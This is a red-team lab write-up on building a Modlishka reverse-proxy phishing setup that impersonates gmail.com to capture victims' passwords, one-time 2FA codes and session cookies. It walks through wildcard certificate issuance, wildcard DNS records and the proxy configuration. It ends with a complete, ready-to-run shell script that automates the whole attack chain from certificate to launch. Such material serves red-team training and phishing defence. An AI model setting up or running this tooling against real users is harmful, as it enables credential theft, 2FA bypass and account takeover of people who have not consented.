Phishing with Modlishka Reverse HTTP Proxy
This lab shows how to set up Modlishka, a reverse HTTP proxy that can be used in phishing campaigns to capture user passwords and 2FA tokens. Modlishka makes this possible because it sits in the middle between the victim and the website you, as the attacker, are impersonating (a man-in-the-middle position): it relays the real site to the victim in real time while recording every credential, token and session cookie that traverses it. Because the one-time code is forwarded to the real site as the victim types it, this defeats code-based 2FA (TOTP, SMS, push approvals); it does not defeat origin-bound authenticators such as FIDO2/WebAuthn security keys, which refuse to sign for the proxy's domain.
Setup
Let's start by creating a new DigitalOcean droplet; the smallest size is more than enough:
Once logged in, install certbot and download the Modlishka binary itself (the project lives at https://github.com/drk1wi/Modlishka):
Modlishka Configuration
Let's create a configuration file for Modlishka:
Wildcard Certificates
Important: we need a wildcard certificate for the domain the phishing victims will land on, *.redteam.me, so that every subdomain Modlishka serves presents a valid certificate. Let's Encrypt only issues wildcard certificates through the DNS-01 challenge, which is why certbot is run in manual DNS mode here:
certbot will print a DNS challenge value, as shown below:
We need to create a DNS TXT record named _acme-challenge.redteam.me with that value in the DNS management console for redteam.me, which in my case is DigitalOcean:
Once the TXT record is created and has propagated (query it with dig TXT _acme-challenge.redteam.me from another host before continuing; certbot validates only once and fails if the record is not yet visible), continue with the certificate generation:
Once the certificates have been generated, we need to convert them into a form that can be embedded in a JSON string: each PEM file has to become a single line, with its newlines turned into literal \n sequences:
Once that is done, copy the contents of the converted certs into the config: fullchain.pem into the cert field and privkey.pem into the certKey field:
More DNS Records
Let's create an A record for the root host (@) that simply points to the droplet's IP:
This is very important: we also need a wildcard CNAME record (*) pointing to @, so that every subdomain under redteam.me resolves to the droplet. Modlishka rewrites the target site's hostnames into subdomains of the phishing domain, so the victim's browser will request names for which no explicit record exists:
Launching Modlishka
We are now ready to start the test by launching Modlishka and passing it the modlishka.json config file:
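Putting the steps above together, here is an added example in POSIX shell (it is not part of the original lab and not Modlishka's own tooling): it issues the wildcard certificate with certbot's manual DNS-01 mode, converts the PEM files into JSON-embeddable strings, writes modlishka.json, checks the A and wildcard CNAME records, and launches the proxy. The droplet IP 203.0.113.10, the binary name Modlishka-linux-amd64 and the config keys other than cert and certKey are assumptions; the keys follow Modlishka's README and should be verified against the version you downloaded.

```shell
#!/bin/sh
# Added example, not from the original lab: end-to-end helper for the
# Modlishka setup. Everything marked ASSUMPTION is not from the lab page.
set -u

# ASSUMPTION: the phishing domain and target used in this lab; the droplet
# IP (TEST-NET-3) and the binary name are placeholders to replace.
PHISH_DOMAIN="${PHISH_DOMAIN:-redteam.me}"
TARGET="${TARGET:-gmail.com}"
DROPLET_IP="${DROPLET_IP:-203.0.113.10}"
MODLISHKA_BIN="${MODLISHKA_BIN:-./Modlishka-linux-amd64}"
LIVE_DIR="/etc/letsencrypt/live/${PHISH_DOMAIN}"

# Step 1: wildcard certificate. Let's Encrypt issues wildcards only via the
# DNS-01 challenge, so certbot pauses while you publish the TXT record it
# prints at _acme-challenge.<domain>. Needs root and network access.
issue_wildcard_cert() {
    certbot certonly --manual --preferred-challenges dns \
        -d "${PHISH_DOMAIN}" -d "*.${PHISH_DOMAIN}"
}

# Check the cert really covers the wildcard before embedding it; a cert for
# the bare domain alone makes every rewritten subdomain throw a TLS error.
cert_covers_wildcard() {
    openssl x509 -in "$1" -noout -text | grep -q "DNS:\*\.${PHISH_DOMAIN}"
}

# Step 2: PEM -> single JSON string. PEM contains no quotes or backslashes,
# so escaping is just turning each newline into the two characters "\n".
pem_to_json_string() {
    awk '{ printf "%s\\n", $0 }' "$1"
}

# Step 3: write modlishka.json to stdout. "cert" and "certKey" are the keys
# the lab fills in; the others follow the Modlishka README (ASSUMPTION:
# confirm the key names for your version). listeningAddress 0.0.0.0 is
# needed so the proxy accepts connections from outside the droplet.
build_modlishka_config() {
    domain=$1; target=$2; cert_file=$3; key_file=$4
    cert=$(pem_to_json_string "$cert_file")
    key=$(pem_to_json_string "$key_file")
    cat <<EOF
{
  "proxyDomain": "${domain}",
  "listeningAddress": "0.0.0.0",
  "target": "${target}",
  "trackingCookie": "id",
  "trackingParam": "id",
  "forceHTTPS": true,
  "debug": false,
  "log": "requests.log",
  "plugins": "all",
  "cert": "${cert}",
  "certKey": "${key}",
  "certPool": ""
}
EOF
}

# Step 4: DNS checks. For a CNAME, "dig +short" prints the canonical name
# first and the final A record last, so only the last line is compared.
answer_matches() {   # stdin: dig +short output; $1: expected IP
    tail -n 1 | grep -qx "$1"
}
check_dns() {
    dig +short A "${PHISH_DOMAIN}" | answer_matches "${DROPLET_IP}" || return 1
    # A label nobody has queried before proves the wildcard itself works,
    # rather than a cached answer for a common name such as www.
    random_label="chk$(date +%s)"
    dig +short "${random_label}.${PHISH_DOMAIN}" | answer_matches "${DROPLET_IP}"
}

# Step 5: launch the proxy with the generated config (-config is the
# Modlishka flag for the JSON file).
launch() {
    "${MODLISHKA_BIN}" -config modlishka.json
}

main() {
    issue_wildcard_cert
    cert_covers_wildcard "${LIVE_DIR}/fullchain.pem"
    build_modlishka_config "${PHISH_DOMAIN}" "${TARGET}" \
        "${LIVE_DIR}/fullchain.pem" "${LIVE_DIR}/privkey.pem" > modlishka.json
    check_dns
    launch
}

# Only define the helpers unless explicitly asked to run the whole sequence.
if [ "${RUN_SETUP:-0}" = "1" ]; then
    main
fi
```

Sourcing the file only defines the helpers; set RUN_SETUP=1 on the droplet to run the full sequence, which needs root for certbot and network access for certbot and dig.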
Below shows how, by visiting redteam.me, I get presented with the contents of gmail.com, indicating that Modlishka and the MITM work. Again, it is important to call this out: we did not create any copies or templates of the targeted website. The victim is actually browsing gmail.com; it is just being served through Modlishka, where the traffic is inspected and passwords are captured: